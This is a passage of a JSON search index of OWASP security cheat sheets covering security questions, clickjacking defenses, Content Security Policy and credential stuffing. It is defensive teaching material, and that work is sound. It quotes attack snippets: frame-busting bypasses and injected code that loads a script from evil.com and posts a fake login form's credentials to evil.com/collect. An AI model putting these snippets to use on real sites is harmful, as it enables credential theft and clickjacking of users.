Additionally, the context of the application must be considered when deciding whether questions are good or bad. For example, a question such as \"What was your maths teacher's surname in your 8th year of school?\" would be very easy to guess if it was using in a virtual learning environment for your school (as other students probably know this information), but would be much stronger for an online gaming website.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#good-questions","title":"Good Questions","text":"

Many good security questions are not applicable to all users, so the best approach is to give the user a list of security questions that they can choose from. This allows you to have more specific questions (with more secure answers), while still providing every user with questions that they can answer.

The following list provides some examples of good questions:

Much like passwords, there is a risk that users will re-use recovery questions between different sites, which could expose the users if the other site is compromised. As such, there are benefits to having unique security questions that are unlikely to be shared between sites. An easy way to achieve this is to create more targeted questions based on the type of application. For example, on a share dealing platform, financial related questions such as \"What is the first company you owned shares in?\" could be used.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#allowing-users-to-write-their-own-questions","title":"Allowing Users to Write Their Own Questions","text":"

Allowing users to write their own security questions can result in them choosing very strong and unique questions that would be very hard for an attacker to guess. However, there is also a significant risk that users will choose weak questions. In some cases, users might even set a recovery question to a reminder of what their password is - allowing anyone guessing their email address to compromise their account.

As such, it is generally best not to allow users to write their own questions.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#restricting-answers","title":"Restricting Answers","text":"

Enforcing a minimum length for answers can prevent users from entering strings such as \"a\" or \"123\" for their answers. However, depending on the questions asked, it could also prevent users from being able to correctly answer the question. For example, asking for a first name or surname could result in a two letter answer such as \"Li\", and a colour-based question could be four letters such as \"blue\".

Answers should also be checked against a block list, including:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#renewing-security-questions","title":"Renewing Security Questions","text":"

If the security questions are not used as part of the main authentication process, then consider periodically prompting the user to review their security questions and verify that they still know the answers. This should give them a chance to update any answers that may have changed (although ideally this shouldn't happen with good questions), and increases the likelihood that they will remember them if they ever need to recover their account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#system-defined-security-questions","title":"System Defined Security Questions","text":"

System defined security questions are based on information that is already known about the user. The users' personal details are often used, including the full name, address and date of birth. However these can easily be obtained by an attacker from social media, and as such provide a very weak level of authentication.

The questions that can be used will vary hugely depending on the application, and how much information is already held about the user. When deciding which bits of information may be usable for security questions, the following areas should be considered:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#using-security-questions","title":"Using Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#when-to-use-security-questions","title":"When to Use Security Questions","text":"

Applications should generally use a password along with a second authentication factor (such as an OTP code) to authenticate users. The combination of a password and security questions does not constitute MFA, as both factors as the same (i.e. something you know)..

Security questions should never be relied upon as the sole mechanism to authenticate a user. However, they can provide a useful additional layer of security when other stronger factors are not available. Common cases where they would be used include:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#authentication-flow","title":"Authentication Flow","text":"

Security questions may be used as part of the main authentication flow to supplement passwords where MFA is not available. A typical authentication flow would be:

If the answers to the security questions are incorrect, then this should be counted as a failed login attempt, and the account lockout counter should be incremented for the user.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#forgotten-password-or-lost-mfa-token-flow","title":"Forgotten Password or Lost MFA Token Flow","text":"

Forgotten password functionality often provides a mechanism for attackers to enumerate user accounts if it is not correctly implemented. The following flow avoids this issue by only displaying the security questions once the user has proved ownership of the email address:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#how-to-use-security-questions","title":"How to Use Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#storing-answers","title":"Storing Answers","text":"

The answers to security questions may contain personal information about the user, and may also be re-used by the user between different applications. As such, they should be treated in the same way as passwords, and stored using a secure hashing algorithm such as Bcrypt. The password storage cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#comparing-answers","title":"Comparing Answers","text":"

Comparing the answers provided by the user with the stored answer in a case insensitive manner makes it much easier for the user. The simplest way to do this is to convert the answer to lowercase before hashing the answer to store it, and then lowercase the user-provided answer before comparing them.

It is also beneficial to give the user some indication of the format that they should use to enter answers. This could be done through input validation, or simply by recommending that the user enters their details in a specific format. For example, when asking for a date, indicating that the format should be \"DD/MM/YYYY\" will mean that the user doesn't have to try and guess what format they entered when registering.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#updating-answers","title":"Updating Answers","text":"

When the user updates the answers to their security questions, this should be treated as a sensitive operation within the application. As such, the user should be required to re-authenticate themselves by entering their password (or ideally using MFA), in order to prevent an attacker updating the questions if they gain temporary access to the user's account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#multiple-security-questions","title":"Multiple Security Questions","text":"

When security questions are used, the user can either be asked a single question, or can be asked multiple questions at the same time. This provides a greater level of assurance, especially if the questions are diverse, as an attacker would need to obtain more information about the target user. A mixture of user-defined and system-defined questions can be very effective for this.

If the user is asked a single question out of a bank of possible questions, then this question should not be changed until the user has answered it correctly. If the attacker is allowed to try answering all of the different security questions, this greatly increases the chance that they will be able to guess or obtain the answer to one of them.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html","title":"Clickjacking Defense Cheat Sheet","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.

There are three main mechanisms that can be used to defend against these attacks:

Note that these mechanisms are all independent of each other, and where possible more than one of them should be implemented in order to provide defense in depth.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-content-security-policy-csp-frame-ancestors-directive","title":"Defending with Content Security Policy (CSP) frame-ancestors directive","text":"

The frame-ancestors directive can be used in a Content-Security-Policy HTTP response header to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks by ensuring that their content is not embedded into other sites.

frame-ancestors allows a site to authorize multiple domains using the normal Content Security Policy semantics.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#content-security-policy-frame-ancestors-examples","title":"Content-Security-Policy: frame-ancestors Examples","text":"

Common uses of CSP frame-ancestors:

Note that the single quotes are required around self and none, but may not occur around other source expressions.

See the following documentation for further details and more complex examples:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations","title":"Limitations","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

The following browsers support CSP frame-ancestors.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-x-frame-options-response-headers","title":"Defending with X-Frame-Options Response Headers","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks, by ensuring that their content is not embedded into other sites. Set the X-Frame-Options header for all responses containing HTML content. The possible values are \"DENY\", \"SAMEORIGIN\", or \"ALLOW-FROM uri\"

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#x-frame-options-header-types","title":"X-Frame-Options Header Types","text":"

There are three possible values for the X-Frame-Options header:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support_1","title":"Browser Support","text":"

The following browsers support X-Frame-Options headers.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#implementation","title":"Implementation","text":"

To implement this protection, you need to add the X-Frame-Options HTTP Response header to any page that you want to protect from being clickjacked via framebusting. One way to do this is to add the HTTP Response Header manually to every page. A possibly simpler way is to implement a filter that automatically adds the header to every page or to add it at Web Application Firewall of Web/Application Server level.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#common-defense-mistakes","title":"Common Defense Mistakes","text":"

Meta-tags that attempt to apply the X-Frame-Options directive DO NOT WORK. For example, <meta http-equiv=\"X-Frame-Options\" content=\"deny\"> will not work. You must apply the X-FRAME-OPTIONS directive as HTTP Response Header as described above.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_1","title":"Limitations","text":" "},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-samesite-cookies","title":"Defending with SameSite Cookies","text":"

The SameSite cookie attribute defined in RFC 6265bis is primarily intended to defend against cross-site request forgery (CSRF); however it can also provide protection against Clickjacking attacks.

Cookies with a SameSite attribute of either strict or lax will not be included in requests made to a page within an <iframe>. This means that if the session cookies are marked as SameSite, any Clickjacking attack that requires the victim to be authenticated will not work, as the cookie will not be sent. An article on the Netsparker blog provides further details on which types of requests cookies are sent for with the different SameSite policies.

This approach is discussed on the JavaScript.info website.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_2","title":"Limitations","text":"

If the Clickjacking attack does not require the user to be authenticated, this attribute will not provide any protection.

Additionally, while SameSite attribute is supported by most modern browsers, there are still some users (approximately 6% as of November 2020) with browsers that do not support it.

The use of this attribute should be considered as part of a defence-in-depth approach, and it should not be relied upon as the sole protective measure against Clickjacking.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#best-for-now-legacy-browser-frame-breaking-script","title":"Best-for-now Legacy Browser Frame Breaking Script","text":"

One way to defend against clickjacking is to include a \"frame-breaker\" script in each page that should not be framed. The following methodology will prevent a webpage from being framed even in legacy browsers, that do not support the X-Frame-Options-Header.

In the document HEAD element, add the following:

First apply an ID to the style element itself:

<style id=\"antiClickjack\">\nbody{display:none !important;}\n</style>\n

Then, delete that style by its ID immediately after in the script:

<script type=\"text/javascript\">\nif\u00a0(self\u00a0===\u00a0top)\u00a0{\nvar\u00a0antiClickjack\u00a0=\u00a0document.getElementById(\"antiClickjack\");\nantiClickjack.parentNode.removeChild(antiClickjack);\n}\u00a0else\u00a0{\ntop.location\u00a0=\u00a0self.location;\n}\n</script>\n

This way, everything can be in the document HEAD and you only need one method/taglib in your API.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#windowconfirm-protection","title":"window.confirm() Protection","text":"

The use of X-Frame-Options or a frame-breaking script is a more fail-safe method of clickjacking protection. However, in scenarios where content must be frameable, then a window.confirm() can be used to help mitigate Clickjacking by informing the user of the action they are about to perform.

Invoking window.confirm() will display a popup that cannot be framed. If the window.confirm() originates from within an iframe with a different domain than the parent, then the dialog box will display what domain the window.confirm() originated from. In this scenario the browser is displaying the origin of the dialog box to help mitigate Clickjacking attacks. It should be noted that Internet Explorer is the only known browser that does not display the domain that the window.confirm() dialog box originated from, to address this issue with Internet Explorer insure that the message within the dialog box contains contextual information about the type of action being performed. For example:

<script type=\"text/javascript\">\nvar\u00a0action_confirm\u00a0=\u00a0window.confirm(\"Are\u00a0you\u00a0sure\u00a0you\u00a0want\u00a0to\u00a0delete\u00a0your\u00a0youtube\u00a0account?\")\nif\u00a0(action_confirm)\u00a0{\n//...\u00a0Perform\u00a0action\n}\u00a0else\u00a0{\n//...\u00a0The\u00a0user\u00a0does\u00a0not\u00a0want\u00a0to\u00a0perform\u00a0the\u00a0requested\u00a0action.`\n}\n</script>\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#insecure-non-working-scripts-do-not-use","title":"Insecure Non-Working Scripts DO NOT USE","text":"

Consider the following snippet which is NOT recommended for defending against clickjacking:

<script>if (top!=self) top.location.href=self.location.href</script>\n

This simple frame breaking script attempts to prevent the page from being incorporated into a frame or iframe by forcing the parent window to load the current frame's URL. Unfortunately, multiple ways of defeating this type of script have been made public. We outline some here.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#double-framing","title":"Double Framing","text":"

Some frame busting techniques navigate to the correct page by assigning a value to parent.location. This works well if the victim page is framed by a single page. However, if the attacker encloses the victim in one frame inside another (a double frame), then accessing parent.location becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation.

Victim frame busting code:

if(top.location != self.location) {\nparent.location = self.location;\n}\n

Attacker top frame:

<iframe src=\"attacker2.html\">\n

Attacker sub-frame:

<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#the-onbeforeunload-event","title":"The onBeforeUnload Event","text":"

A user can manually cancel any navigation request submitted by a framed page. To exploit this, the framing page registers an onBeforeUnload handler which is called whenever the framing page is about to be unloaded due to navigation. The handler function returns a string that becomes part of a prompt displayed to the user.

Say the attacker wants to frame PayPal. He registers an unload handler function that returns the string \"Do you want to exit PayPal?\". When this string is displayed to the user is likely to cancel the navigation, defeating PayPal's frame busting attempt.

The attacker mounts this attack by registering an unload event on the top page using the following code:

<script>\nwindow.onbeforeunload = function(){\nreturn \"Asking the user nicely\";\n}\n</script>\n\n<iframe src=\"http://www.paypal.com\">\n

PayPal's frame busting code will generate a BeforeUnload event activating our function and prompting the user to cancel the navigation event.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#no-content-flushing","title":"No-Content Flushing","text":"

While the previous attack requires user interaction, the same attack can be done without prompting the user. Most browsers (IE7, IE8, Google Chrome, and Firefox) enable an attacker to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting a navigation request to a site responding with \"204 - No Content\".

Navigating to a No Content site is effectively a NOP, but flushes the request pipeline, thus canceling the original navigation request. Here is sample code to do this:

var preventbust = 0\nwindow.onbeforeunload = function() { killbust++ }\nsetInterval( function() {\nif(killbust > 0){\nkillbust = 2;\nwindow.top.location = 'http://nocontent204.com'\n}\n}, 1);\n
<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#exploiting-xss-filters","title":"Exploiting XSS filters","text":"

IE8 and Google Chrome introduced reflective XSS filters that help protect web pages from certain types of XSS attacks. Nava and Lindsay (at Blackhat) observed that these filters can be used to circumvent frame busting code. The IE8 XSS filter compares given request parameters to a set of regular expressions in order to look for obvious attempts at cross-site scripting. Using \"induced false positives\", the filter can be used to disable selected scripts. By matching the beginning of any script tag in the request parameters, the XSS filter will disable all inline scripts within the page, including frame busting scripts. External scripts can also be targeted by matching an external include, effectively disabling all external scripts. Since subsets of the JavaScript loaded is still functional (inline or external) and cookies are still available, this attack is effective for clickjacking.

Victim frame busting code:

<script>\nif(top != self) {\ntop.location = self.location;\n}\n</script>\n

Attacker:

<iframe src=\"http://www.victim.com/?v=<script>if''>\n

The XSS filter will match that parameter <script>if to the beginning of the frame busting script on the victim and will consequently disable all inline scripts in the victim's page, including the frame busting script. The XSSAuditor filter available for Google Chrome enables the same exploit.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#clobbering-toplocation","title":"Clobbering top.location","text":"

Several modern browsers treat the location variable as a special immutable attribute across all contexts. However, this is not the case in IE7 and Safari 4.0.4 where the location variable can be redefined.

IE7: Once the framing page redefines location, any frame busting code in a subframe that tries to read top.location will commit a security violation by trying to read a local variable in another domain. Similarly, any attempt to navigate by assigning top.location will fail.

Victim frame busting code:

if(top.location != self.location) {\ntop.location = self.location;\n}\n

Attacker:

<script>var location = \"clobbered\";</script>\n<iframe src=\"http://www.victim.com\"></iframe>\n

Safari 4.0.4:

We observed that although location is kept immutable in most circumstances, when a custom location setter is defined via defineSetter (through window) the object location becomes undefined.

The framing page simply does:

<script>\nwindow.defineSetter(\"location\", function(){});\n</script>\n

Now any attempt to read or navigate the top frame's location will fail.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#restricted-zones","title":"Restricted zones","text":"

Most frame busting relies on JavaScript in the framed page to detect framing and bust itself out. If JavaScript is disabled in the context of the subframe, the frame busting code will not run. There are unfortunately several ways of restricting JavaScript in a subframe:

In IE 8:

<iframe src=\"http://www.victim.com\" security=\"restricted\"></iframe>\n

In Chrome:

<iframe src=\"http://www.victim.com\" sandbox></iframe>\n

Firefox and IE:

Activate designMode in parent page.

document.designMode = \"on\";\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html","title":"Content Security Policy Cheat Sheet","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article brings forth a way to integrate the defense in depth concept to the client-side of web applications. By injecting the Content-Security-Policy (CSP) headers from the server, the browser is aware and capable of protecting the user from dynamic calls that will load content into the page currently being visited.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#context","title":"Context","text":"

The increase in XSS (Cross-Site Scripting), clickjacking, and cross-site leak vulnerabilities demands a more defense in depth security approach.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-xss","title":"Defense against XSS","text":"

CSP defends against XSS attacks in the following ways:

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-restricting-inline-scripts","title":"1. Restricting Inline Scripts","text":"

By preventing the page from executing inline scripts, attacks like injecting

<script>document.body.innerHTML='defaced'</script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-restricting-remote-scripts","title":"2. Restricting Remote Scripts","text":"

By preventing the page from loading scripts from arbitrary servers, attacks like injecting

<script src=\"https://evil.com/hacked.js\"></script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-restricting-unsafe-javascript","title":"3. Restricting Unsafe JavaScript","text":"

By preventing the page from executing text-to-JavaScript functions like eval, the website will be safe from vulnerabilities like the this:

// A Simple Calculator\nvar op1 = getUrlParameter(\"op1\");\nvar op2 = getUrlParameter(\"op2\");\nvar sum = eval(`${op1} + ${op2}`);\nconsole.log(`The sum is: ${sum}`);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#4-restricting-form-submissions","title":"4. Restricting Form submissions","text":"

By restricting where HTML forms on your website can submit their data, injecting phishing forms won't work either.

<form method=\"POST\" action=\"https://evil.com/collect\">\n<h3>Session expired! Please login again.</h3>\n<label>Username</label>\n<input type=\"text\" name=\"username\"/>\n\n<label>Password</label>\n<input type=\"password\" name=\"pass\"/>\n\n<input type=\"Submit\" value=\"Login\"/>\n</form>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#5-restricting-objects","title":"5. Restricting Objects","text":"

And by restricting the HTML object tag, it also won't be possible for an attacker to inject malicious flash/Java/other legacy executables on the page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-framing-attacks","title":"Defense against framing attacks","text":"

Attacks like clickjacking and some variants of browser side-channel attacks (xs-leaks) require a malicious website to load the target website in a frame.

Historically the X-Frame-Options header has been used for this, but it has been obsoleted by the frame-ancestors CSP directive.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

A strong CSP provides an effective second layer of protection against various types of vulnerabilities, especially XSS. Although CSP doesn't prevent web applications from containing vulnerabilities, it can make those vulnerabilities significantly more difficult for an attacker to exploit.

Even on a fully static website, which does not accept any user input, a CSP can be used to enforce the use of Subresource Integrity (SRI). This can help prevent malicious code from being loaded on the website if one of the third-party sites hosting JavaScript files (such as analytics scripts) is compromised.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-is-not-a-substitute-for-secure-development","title":"CSP is not a substitute for secure development","text":"

CSP should not be relied upon as the only defensive mechanism against XSS. You must still follow good development practices such as the ones described in Cross-Site Scripting Prevention Cheat Sheet, and then deploy CSP on top of that as a bonus security layer.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#policy-delivery","title":"Policy Delivery","text":"

You can deliver a Content Security Policy to your website in three ways.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-content-security-policy-header","title":"1. Content-Security-Policy Header","text":"

Send a Content-Security-Policy HTTP response header from your web server.

Content-Security-Policy: ...\n

Using a header is the preferred way and supports the full CSP feature set. Send it in all HTTP responses, not just the index page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-content-security-policy-report-only-header","title":"2. Content-Security-Policy-Report-Only Header","text":"

Using the Content-Security-Policy-Report-Only, you can deliver a CSP that doesn't get enforced.

Content-Security-Policy-Report-Only: ...\n

Still, violation reports are printed to the console and delivered to a violation endpoint if the report-to and report-uri directives are used.

Browsers fully support the ability of a site to use both Content-Security-Policy and Content-Security-Policy-Report-Only together, without any issues. This pattern can be used for example to run a strict Report-Only policy (to get many violation reports), while having a looser enforced policy (to avoid breaking legitimate site functionality).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-content-security-policy-meta-tag","title":"3. Content-Security-Policy Meta Tag","text":"

Sometimes you cannot use the Content-Security-Policy header if you are, e.g., Deploying your HTML files in a CDN where the headers are out of your control.

In this case, you can still use CSP by specifying a http-equiv meta tag in the HTML markup, like so:

<meta http-equiv=\"Content-Security-Policy\" content=\"...\">\n

Almost everything is still supported, including full XSS defenses. However, you will not be able to use framing protections, sandboxing, or a CSP violation logging endpoint.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#http-headers","title":"HTTP Headers","text":"

The following are headers for CSP.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-directives","title":"CSP Directives","text":"

Multiple types of directives exist that allow the developer to control the flow of the policies granularly.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#fetch-directives","title":"Fetch Directives","text":"

Fetch directives tell the browser the locations to trust and load resources from.

Most fetch directives have a certain fallback list specified in w3. This list allows for granular control of the source of scripts, images, files, etc.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#document-directives","title":"Document Directives","text":"

Document directives instruct the browser about the properties of the document to which the policies will apply to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#navigation-directives","title":"Navigation Directives","text":"

Navigation directives instruct the browser about the locations that the document can navigate to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#reporting-directives","title":"Reporting Directives","text":"

Reporting directives deliver violations of prevented behaviors to specified locations. These directives serve no purpose on their own and are dependent on other directives.

In order to ensure backward compatibility, use the 2 directives in conjunction. Whenever a browser supports report-to, it will ignore report-uri. Otherwise, report-uri will be used.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#special-directive-sources","title":"Special Directive Sources","text":"Value Description 'none' No URLs match. 'self' Refers to the origin site with the same scheme and port number. 'unsafe-inline' Allows the usage of inline scripts or styles. 'unsafe-eval' Allows the usage of eval in scripts. 'strict-dynamic' Informs the browser to trust scripts originating from a root trusted script.

Note: strict-dynamic is not a standalone directive and should be used in combination with other directive values, such as nonce, hashes, etc.

To better understand how the directive sources work, check out the source lists from w3c.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#hashes","title":"Hashes","text":"

When inline scripts are required, the script-src 'hash_algo-hash' is one option for allowing only specific scripts to execute.

Content-Security-Policy: script-src 'sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='\n

To get the hash, look at Google Chrome developer tools for violations like this:

\u274c Refused to execute inline script because it violates the following Content Security Policy directive: \"...\" Either the 'unsafe-inline' keyword, a hash ('sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='), or a nonce...

You can also use this hash generator. This is a great example of using hashes.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#note","title":"Note","text":"

Using hashes is generally not a very good approach. If you change anything inside the script tag (even whitespace) by, e.g., formatting your code, the hash will be different, and the script won't render.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#nonces","title":"Nonces","text":"

Nonces are unique one-time-use random values that you generate for each HTTP response, and add to the Content-Security-Policy header, like so:

const nonce = uuid.v4();\nscriptSrc += ` 'nonce-${nonce}'`;\n

You would then pass this nonce to your view (using nonces requires a non-static HTML) and render script tags that look something like this:

<script nonce=\"<%= nonce %>\">\n...\n</script>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#warning","title":"Warning","text":"

Don't create a middleware that replaces all script tags with \"script nonce=...\" because attacker-injected scripts will then get the nonces as well. You need an actual HTML templating engine to use nonces.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-dynamic","title":"strict-dynamic","text":"

The strict-dynamic directive can be used in combination with either, hashes or nonces.

If the script block is creating additional DOM elements and executing JS inside of them, strict-dynamic tells the browser to trust those elements.

Note that strict-dynamic is a CSP level 3 feature and not very widely supported yet. For more details, check out strict-dynamic usage.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-sample-policies","title":"CSP Sample Policies","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#basic-csp-policy","title":"Basic CSP Policy","text":"

This policy prevents cross-site framing and cross-site form-submissions. It will only allow resources from the originating domain for all the default level directives and will not allow inline scripts/styles to execute.

If your application functions with these restrictions, it drastically reduces your attack surface and works with most modern browsers.

The most basic policy assumes:

Content-Security-Policy:\u00a0default-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

To tighten further, one can apply the following:

Content-Security-Policy:\u00a0default-src\u00a0'none';\u00a0script-src\u00a0'self';\u00a0connect-src\u00a0'self';\u00a0img-src\u00a0'self';\u00a0style-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

This policy allows images, scripts, AJAX, and CSS from the same origin and does not allow any other resources to load (e.g., object, frame, media, etc.).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#upgrading-insecure-requests","title":"Upgrading insecure requests","text":"

If the developer is migrating from HTTP to HTTPS, the following directive will ensure that all requests will be sent over HTTPS with no fallback to HTTP:

Content-Security-Policy: upgrade-insecure-requests;\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#preventing-framing-attacks-clickjacking-cross-site-leaks","title":"Preventing framing attacks (clickjacking, cross-site leaks)","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-policy","title":"Strict Policy","text":"

A strict policy's role is to protect against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.

Google went ahead and set up a guide to adopt a strict CSP based on nonces.

Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:

script-src 'nonce-r4nd0m' 'strict-dynamic';\nobject-src 'none'; base-uri 'none';\n
script-src 'nonce-r4nd0m';\nobject-src 'none'; base-uri 'none';\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#refactoring-inline-code","title":"Refactoring inline code","text":"

When default-src or script-src* directives are active, CSP by default disables any JavaScript code placed inline in the HTML source, such as this:

<script>\nvar foo = \"314\"\n<script>\n

The inline code can be moved to a separate JavaScript file and the code in the page becomes:

<script src=\"app.js\">\n</script>\n

With app.js containing the var foo = \"314\" code.

The inline code restriction also applies to inline event handlers, so that the following construct will be blocked under CSP:

<button id=\"button1\" onclick=\"doSomething()\">\n

This should be replaced by addEventListener calls:

document.getElementById(\"button1\").addEventListener('click',\u00a0doSomething);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html","title":"Credential Stuffing Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet covers defences against two common types of authentication-related attacks: credential stuffing and password spraying. Although these are separate, distinct attacks, in many cases the defences that would be implemented to protect against them are the same, and they would also be effective at protecting against brute-force attacks. A summary of these different attacks is listed below:

Attack Type Description Brute Force Testing multiple passwords from dictionary or other source against a single account. Credential Stuffing Testing username/password pairs obtained from the breach of another site. Password Spraying Testing a single weak password against a large number of different accounts."},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

In order to balance security and usability, multi-factor authentication can be combined with other techniques to require for 2nd factor only in specific circumstances where there is reason to suspect that the login attempt may not be legitimate, such as a login from:

Additionally, for enterprise applications, known trusted IP ranges could be added to an allow list so that MFA is not required when users connect from these ranges.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#alternative-defenses","title":"Alternative Defenses","text":"

Where it is not possible to implement MFA, there are many alternative defenses that can be used to protect against credential stuffing and password spraying. In isolation none of these are as effective as MFA, however if multiple defenses are implemented in a layered approach, they can provide a reasonable degree of protection. In many cases, these mechanisms will also protect against brute-force or password spraying attacks.

Where an application has multiple user roles, it may be appropriate to implement different defenses for different roles. For example, it may not be feasible to enforce MFA for all users, but it should be possible to require that all administrators use it.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#secondary-passwords-pins-and-security-questions","title":"Secondary Passwords, PINs and Security Questions","text":"

As well as requiring a user to enter their password when authenticating, they can also be prompted to provide additional security information such as:

It must be emphasised that this does not constitute multi-factor authentication (as both factors are the same - something you know). However, it can still provide a useful layer of protection against both credential stuffing and password spraying where proper MFA can't be implemented.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

